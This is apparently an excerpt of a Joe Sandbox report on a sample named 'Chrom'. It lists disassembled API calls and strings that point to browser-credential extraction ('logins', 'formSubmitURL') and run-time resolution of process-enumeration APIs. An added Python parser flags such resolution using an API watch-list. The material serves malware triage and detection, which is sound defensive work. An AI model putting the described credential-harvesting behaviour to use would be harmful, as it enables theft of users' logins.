  • Part of subcall function 00408F0A: strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409000
  • Part of subcall function 00408F0A: strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409013
  • Part of subcall function 00408F0A: wcscpy.MSVCRT ref: 00409022
  • Part of subcall function 00408F0A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00409048
  • Part of subcall function 00408F0A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00409062
Strings
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide$strcpy$memset$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
• String ID: formSubmitURL$guid$logins$null
• API String ID: 1954096314-80472114
• Opcode ID: 7e317ccb2718545a6502de2a7b504e547521713b1ef01b8e4aca76a10726caf1
• Instruction ID: ed379e5704be75f3e6866550497b864d9ddced9f47acb00a3616e2846d1467bc
• Opcode Fuzzy Hash: 7e317ccb2718545a6502de2a7b504e547521713b1ef01b8e4aca76a10726caf1
• Instruction Fuzzy Hash: 318175B1D4021EBAEF20BBA18C82EEE767DEF04318F11417BB514B61D2DA385E459F64
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: _snwprintf$memset$wcscpy
• String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
• API String ID: 2000436516-3842416460
• Opcode ID: 5fe8db686efc772fa6b4f80b717c1a9ed323b4090c8ee1f0a390374eed08aaa7
• Instruction ID: de9e738956947f7a13c6b231079008692334f1b8e04242fb28e7d90039f4c50e
• Opcode Fuzzy Hash: 5fe8db686efc772fa6b4f80b717c1a9ed323b4090c8ee1f0a390374eed08aaa7
• Instruction Fuzzy Hash: 024154B1940219AAEB20EB55CC81EEB737CFF45304F0540BBB908A2552E7399B988F65
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: _snwprintf$memset$wcscpy
• String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
• API String ID: 2000436516-3842416460
• Opcode ID: 35a9874a1796bbad2c5835aadc159d16ef12338abd3b36aedf42a62c4a9f3186
• Instruction ID: 16ebb7c4a1209ddf7042b365c973bf7ab66be9daa39a45122df40dcc931b4b2c
• Opcode Fuzzy Hash: 35a9874a1796bbad2c5835aadc159d16ef12338abd3b36aedf42a62c4a9f3186
• Instruction Fuzzy Hash: F64194B1940219AAEB20EB55CC81EEB777CFF45304F0540BBF908E2552E7399B988F65
APIs
  • Part of subcall function 004083CC: _wcsicmp.MSVCRT ref: 004083FD
  • Part of subcall function 004086CB: memset.MSVCRT ref: 004087C7
• free.MSVCRT ref: 0040C1F8
  • Part of subcall function 0040BAAE: _wcsicmp.MSVCRT ref: 0040BAC7
• memset.MSVCRT ref: 0040C0DE
  • Part of subcall function 0040B04F: wcslen.MSVCRT ref: 0040B062
  • Part of subcall function 0040B04F: memcpy.MSVCRT(?,?,00000000,00000000,0040D237,00000000,?,?), ref: 0040B081
• wcschr.MSVCRT ref: 0040C116
• memcpy.MSVCRT(?,-00000121,00000008,0044F4CC,00000000,00000000,74DF2EE0), ref: 0040C14A
• memcpy.MSVCRT(?,-00000121,00000008,0044F4CC,00000000,00000000,74DF2EE0), ref: 0040C165
• memcpy.MSVCRT(?,-00000220,00000008,0044F4CC,00000000,00000000,74DF2EE0), ref: 0040C180
• memcpy.MSVCRT(?,-00000220,00000008,0044F4CC,00000000,00000000,74DF2EE0), ref: 0040C19B
Strings
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
• String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
• API String ID: 3849927982-2252543386
• Opcode ID: 88369df32d75ba6dda54d6ab21b62e9966401b16cb4a5860ce309962b4da41d8
• Instruction ID: 832bc5c0d001ab4c3975677652535c3cfd3fcf8644338d95e37f76bfb8271b51
• Opcode Fuzzy Hash: 88369df32d75ba6dda54d6ab21b62e9966401b16cb4a5860ce309962b4da41d8
• Instruction Fuzzy Hash: D2514071E003099BDB10DFA5DD86ADEB7B8AF40704F15453BA504BB2D2EB7899058F58
APIs
• memset.MSVCRT ref: 0040E07B
• memset.MSVCRT ref: 0040E097
  • Part of subcall function 0040A189: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040E194,00000000,0040E047,?,00000000,00000208,?), ref: 0040A194
  • Part of subcall function 00446665: GetFileVersionInfoSizeW.VERSION(0040E0C9,?,00000000), ref: 0044667B
  • Part of subcall function 00446665: ??2@YAPAXI@Z.MSVCRT(?,00000000,0040E0C9,?,00000000), ref: 00446696
  • Part of subcall function 00446665: GetFileVersionInfoW.VERSION(0040E0C9,00000000,?,00000000,00000000,0040E0C9,?,00000000), ref: 004466A6
  • Part of subcall function 00446665: VerQueryValueW.VERSION(00000000,00453E4C,0040E0C9,?,0040E0C9,00000000,?,00000000,00000000,0040E0C9,?,00000000), ref: 004466B9
  • Part of subcall function 00446665: VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,00453E4C,0040E0C9,?,0040E0C9,00000000,?,00000000,00000000,0040E0C9,?,00000000), ref: 004466F6
  • Part of subcall function 00446665: _snwprintf.MSVCRT ref: 00446716
  • Part of subcall function 00446665: wcscpy.MSVCRT ref: 00446740
• wcscpy.MSVCRT ref: 0040E0DB
• wcscpy.MSVCRT ref: 0040E0EA
• wcscpy.MSVCRT ref: 0040E0FA
• EnumResourceNamesW.KERNEL32(0040E1F9,00000004,0040DE05,00000000), ref: 0040E15F
• EnumResourceNamesW.KERNEL32(0040E1F9,00000005,0040DE05,00000000), ref: 0040E169
                                                                                                                                                        • wcscpy.MSVCRT ref: 0040E171
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: wcscpy$File$EnumInfoNamesQueryResourceValueVersionmemset$??2@ModuleNameSize_snwprintf
                                                                                                                                                        • String ID: RTL$TranslatorName$TranslatorURL$Version$general$hE$strings
                                                                                                                                                        • API String ID: 3037099051-2452564618
                                                                                                                                                        • Opcode ID: 36a298b38765c7c9715b799f2682acc7fcb4a893d173dce7fa7602aae9355a61
                                                                                                                                                        • Instruction ID: 2c5873c7a60e264be4f9171a36220462047ece05b997d6ce6468ce1c7a270e3a
                                                                                                                                                        • Opcode Fuzzy Hash: 36a298b38765c7c9715b799f2682acc7fcb4a893d173dce7fa7602aae9355a61
                                                                                                                                                        • Instruction Fuzzy Hash: DB21D972E4021875D720BB978C46FCB3B6C9F45758F010477B90876193E6B85BC885AE
APIs
• memset.MSVCRT ref: 00404B34
  • Part of subcall function 0040ACA5: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040121D,?,?,?,?,?,?,?), ref: 0040ACBE
• memcpy.MSVCRT(0000013F,00000000,00000000,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 00404C24
• memcmp.MSVCRT(00000000,0045B4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 00404C34
• memcpy.MSVCRT(00000014,00000023,?), ref: 00404C67
• memcpy.MSVCRT(0000012F,?,00000010), ref: 00404C80
• memcmp.MSVCRT(00000000,0045B4E8,00000006), ref: 00404C96
• memcpy.MSVCRT(00000014,00000015,?), ref: 00404CB2
• memcpy.MSVCRT(-0000011F,?,00000010), ref: 00404CCB
• memcmp.MSVCRT(00000000,0045B238,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404D79
• memcmp.MSVCRT(00000000,0045B500,00000006), ref: 00404D91
• memcpy.MSVCRT(00000268,00000023,?), ref: 00404DCA
• memcpy.MSVCRT(000003C8,00000042,00000010), ref: 00404DE6
• memcpy.MSVCRT(-00000368,00000054,00000020), ref: 00404E02
• memcmp.MSVCRT(00000000,0045B4F8,00000006), ref: 00404E14
• memcpy.MSVCRT(00000268,00000015,?), ref: 00404E38
• memcpy.MSVCRT(-00000368,0000001A,00000020), ref: 00404E50
Strings
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: memcpy$memcmp$ByteCharMultiWidememset
• String ID:
• API String ID: 3715365532-3916222277
• Opcode ID: 5ecca13a8667a5055cb12e86e8931f63f7f9f3ee63bd6537aeb0e59f26b2527b
• Instruction ID: 9db0de9f1e5b33104745f3d8eac733b3821debaf75d372e7250164ca2aaf5d57
• Opcode Fuzzy Hash: 5ecca13a8667a5055cb12e86e8931f63f7f9f3ee63bd6537aeb0e59f26b2527b
• Instruction Fuzzy Hash: 03A1C8B1A01215ABDB11EF61CC41BDF73A8BF45308F01453BFA15E7282E778AA548BD9
APIs
  • Part of subcall function 00409C82: CreateFileW.KERNELBASE(00000003,80000000,00000003,00000000,00000003,00000000,00000000,0040D0E2,0040118B,0040118B,?,?,?,?,000003FF), ref: 00409C94
• GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,00409C47,?,?,?,0000001E,?,?,00000104), ref: 004097E2
• ??2@YAPAXI@Z.MSVCRT(00000001,?,00409C47,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004097F6
  • Part of subcall function 0040A8AE: ReadFile.KERNELBASE(?,?,?,00000000,00000000,?,?,0040D11F,?,?,00000000), ref: 0040A8C5
• memset.MSVCRT ref: 00409828
• memset.MSVCRT ref: 0040984A
• memset.MSVCRT ref: 0040985F
• strcmp.MSVCRT ref: 0040989E
• strcpy.MSVCRT(?,?,?,?,?,?), ref: 00409934
• strcpy.MSVCRT(?,?,?,?,?,?), ref: 00409953
• memset.MSVCRT ref: 00409967
• strcmp.MSVCRT ref: 004099C4
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 004099F6
• CloseHandle.KERNEL32(?,?,00409C47,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004099FF
Strings
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: memset$File$strcmpstrcpy$??2@??3@CloseCreateHandleReadSize
• String ID: ---
• API String ID: 3751793120-2854292027
• Opcode ID: 9829021a33fa0c4240cc714bdbc117138227f934a385a668a1d7ce2f2a0a4b46
• Instruction ID: b5e8b399fdeb6a040b223f826d27245e63d255c1968850f26e436778d13c1eb2
• Opcode Fuzzy Hash: 9829021a33fa0c4240cc714bdbc117138227f934a385a668a1d7ce2f2a0a4b46
• Instruction Fuzzy Hash: 946173B2C0526DAADF21EB948C859DFB7BCAB15314F1440BFE504B3242DB385E85CB69
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: _wcsicmp
• String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
• API String ID: 2081463915-1959339147
• Opcode ID: 64e89c5a136ad70e2acd74f1c00236fdbd2f6e87aea00cca4f40c1ec5a2b789d
• Instruction ID: e86e95086dff50f6aeac70f7173157b3529105d44adcd95765e423e28c57b3de
• Opcode Fuzzy Hash: 64e89c5a136ad70e2acd74f1c00236fdbd2f6e87aea00cca4f40c1ec5a2b789d
• Instruction Fuzzy Hash: 7201DE7328B31134F825A1A72D27B8707598BD2B7BF32455BF915C81C5EF8C849450AE
APIs
  • Part of subcall function 0040AE2A: memset.MSVCRT ref: 0040AE4A
  • Part of subcall function 0040AE2A: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040AE67
  • Part of subcall function 0040AE2A: wcscpy.MSVCRT ref: 0040AE7A
  • Part of subcall function 0040AE2A: wcscat.MSVCRT ref: 0040AE90
  • Part of subcall function 0040AE2A: LoadLibraryW.KERNELBASE(00000000), ref: 0040AEA1
  • Part of subcall function 0040AE2A: LoadLibraryW.KERNEL32(?), ref: 0040AEAA
• GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0041533A
• GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 0041534B
• GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041535C
• GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041536D
• GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 0041537E
• FreeLibrary.KERNEL32(00000000), ref: 0041539E
Strings
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
• String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
• API String ID: 2012295524-70141382
• Opcode ID: 525b725ba8c3cdc06b652b5915534c9690f6b9e2340cfe00d9bbfd5c1f2d1a79
• Instruction ID: 5d1c1eff7ac7706bec5e35702e10e1a9346d9393ddc5072ea1b98c1f41432ca5
• Opcode Fuzzy Hash: 525b725ba8c3cdc06b652b5915534c9690f6b9e2340cfe00d9bbfd5c1f2d1a79
• Instruction Fuzzy Hash: 080175B0941B15D9D7115B35ED00BBB3FA49B85B82B10003BEC14D2A92DBBCC8469B6D
                                                                                                                                                        APIs
                                                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,004138C5), ref: 00415299
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 004152B2
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,Module32First), ref: 004152C3
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 004152D4
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,Process32First), ref: 004152E5
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004152F6
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                                                                        • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                        • API String ID: 667068680-3953557276
                                                                                                                                                        • Opcode ID: 26c7815ee6b58201438f61c557156c8ff69da56f2b6ddbed2f7ec124cb4fbf79
                                                                                                                                                        • Instruction ID: 5e4339a03d4da52fda9f673776543f218f6d4f87af018ab15887d8e286533b58
                                                                                                                                                        • Opcode Fuzzy Hash: 26c7815ee6b58201438f61c557156c8ff69da56f2b6ddbed2f7ec124cb4fbf79
                                                                                                                                                        • Instruction Fuzzy Hash: 70F08630905B19E997215F35AD61BBF2EE89785B82714043BEC00D3296DBA8C8468AAC
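The two function records above are the concrete instances behind the "Contains functionality to dynamically determine API calls" signature: one resolves the psapi.dll enumeration exports (EnumProcesses, EnumProcessModules, GetModuleBaseNameW, ...) through LoadLibrary/GetProcAddress, the other resolves the Toolhelp32 family (CreateToolhelp32Snapshot, Process32First/Next, Module32First/Next) through GetModuleHandleW/GetProcAddress. Process and module enumeration resolved this way is worth triaging on its own, since it is the usual precursor to locating browser or security-product processes. The following is an added example, not part of the Joe Sandbox report: a parser for the report's per-function "APIs" listings that flags any function resolving a watch-list of enumeration APIs at run time. The line format is taken from the listing above; the sample input is constructed from it, and the psapi.dll record (with its LoadLibraryW/FreeLibrary calls and all its `ref:` addresses) is hypothetical, because the page shows only that function's string IDs, not its call lines.

```python
"""Flag Joe Sandbox function records that resolve process-enumeration APIs
at run time via GetProcAddress.

Added example, not part of the Joe Sandbox report. The API-line format is
copied from the report; SAMPLE_REPORT is constructed (record 3 is hypothetical).
"""
import re

# Matches the report's API lines, e.g.
#   • GetProcAddress.KERNEL32(00000000,Process32First), ref: 004152E5
#   • wcscpy.MSVCRT ref: 0040DFA9
#   • Part of subcall function 0040A157: GetFileAttributesW.KERNELBASE(?,...), ref: 0040A15B
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)

# Enumeration exports whose run-time resolution deserves a look.
WATCHLIST = {
    "CreateToolhelp32Snapshot", "Process32First", "Process32Next",
    "Module32First", "Module32Next",
    "EnumProcesses", "EnumProcessModules", "GetModuleBaseNameW",
    "GetModuleFileNameExW", "GetModuleInformation",
}
RESOLVERS = {"GetProcAddress"}

# Constructed sample: record 1 and record 2 mirror the listing on this page;
# record 3 (psapi.dll) and its refs are hypothetical.
SAMPLE_REPORT = """\
APIs
• GetModuleHandleW.KERNEL32(kernel32.dll,?,004138C5), ref: 00415299
• GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 004152B2
• GetProcAddress.KERNEL32(00000000,Module32First), ref: 004152C3
• GetProcAddress.KERNEL32(00000000,Module32Next), ref: 004152D4
• GetProcAddress.KERNEL32(00000000,Process32First), ref: 004152E5
• GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004152F6
Strings
APIs
• GetDC.USER32(00000000), ref: 00411D4C
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00411D57
• ReleaseDC.USER32(00000000,00000000), ref: 00411D6C
  • Part of subcall function 00411B13: GetCursorPos.USER32(?), ref: 00411B1D
APIs
• LoadLibraryW.KERNEL32(psapi.dll), ref: 00415100
• GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00415110
• GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00415120
• FreeLibrary.KERNEL32(00000000), ref: 00415130
"""


def parse_records(text):
    """Split the listing into per-function records, one list of calls each."""
    records, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":          # every function record opens with this label
            current = []
            records.append(current)
            continue
        m = API_LINE.match(line)
        if m and current is not None:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            current.append({"name": m["name"], "module": m["module"],
                            "args": args, "ref": m["ref"], "subcall": m["sub"]})
    return records


def resolved_names(record):
    """Export names passed to GetProcAddress within one record."""
    names = set()
    for call in record:
        if call["name"] in RESOLVERS and call["args"]:
            proc = call["args"][-1]
            # Joe Sandbox prints string arguments by value and numeric ones as
            # 8 hex digits; '?' marks an argument it could not recover.
            if proc != "?" and not re.fullmatch(r"[0-9A-F]{8}", proc):
                names.add(proc)
    return names


def flag_dynamic_enumeration(text):
    """Return one finding per record that resolves a watch-listed export."""
    findings = []
    for idx, record in enumerate(parse_records(text)):
        hits = resolved_names(record) & WATCHLIST
        if hits:
            first = next(c for c in record if c["name"] in RESOLVERS)
            findings.append({"record": idx, "first_ref": first["ref"],
                             "resolved": sorted(hits)})
    return findings


if __name__ == "__main__":
    for f in flag_dynamic_enumeration(SAMPLE_REPORT):
        print(f"record {f['record']} @ {f['first_ref']}: {', '.join(f['resolved'])}")
```

Run against a full report export, the `first_ref` value gives the address to jump to in the disassembly; the GDI record in the sample is deliberately present to show that ordinary UI functions produce no finding.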
APIs
• GetDC.USER32(00000000), ref: 00411D4C
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00411D57
• ReleaseDC.USER32(00000000,00000000), ref: 00411D6C
• SetBkMode.GDI32(?,00000001), ref: 00411D7F
• SetTextColor.GDI32(?,00FF0000), ref: 00411D8D
• SelectObject.GDI32(?,?), ref: 00411D9E
• DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00411DD2
• SelectObject.GDI32(00000014,00000005), ref: 00411DDE
  • Part of subcall function 00411B13: GetCursorPos.USER32(?), ref: 00411B1D
  • Part of subcall function 00411B13: GetSubMenu.USER32(?,00000000), ref: 00411B2B
  • Part of subcall function 00411B13: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 00411B5C
• GetModuleHandleW.KERNEL32(00000000), ref: 00411DF9
• LoadCursorW.USER32(00000000,00000067), ref: 00411E02
• SetCursor.USER32(00000000), ref: 00411E09
• PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00411E51
• memcpy.MSVCRT(?,?,00002008), ref: 00411E9A
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
• String ID:
• API String ID: 1700100422-0
• Opcode ID: 1cf45927c7e1b7e483f25d449432d44785f5cb0323d7f80aabb60001f85816e7
• Instruction ID: c3388cb0b8e88e79d9fe84f40c546f28c4105956407e34fadf5c2981354f7f70
• Opcode Fuzzy Hash: 1cf45927c7e1b7e483f25d449432d44785f5cb0323d7f80aabb60001f85816e7
• Instruction Fuzzy Hash: 4D61B031604205ABDB14EFA4CC89BEA77A5FF44301F10452AFB059B2A1CB79AC91CB99
APIs
  • Part of subcall function 0040A157: GetFileAttributesW.KERNELBASE(?,0040DF98,?,0040E04F,00000000,?,00000000,00000208,?), ref: 0040A15B
• wcscpy.MSVCRT ref: 0040DFA9
• wcscpy.MSVCRT ref: 0040DFB9
• GetPrivateProfileIntW.KERNEL32(0045E668,rtl,00000000,0045E458), ref: 0040DFCA
  • Part of subcall function 0040DB0B: GetPrivateProfileStringW.KERNEL32(0045E668,?,0044F4CC,0045E6F8,?,0045E458), ref: 0040DB27
Strings
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
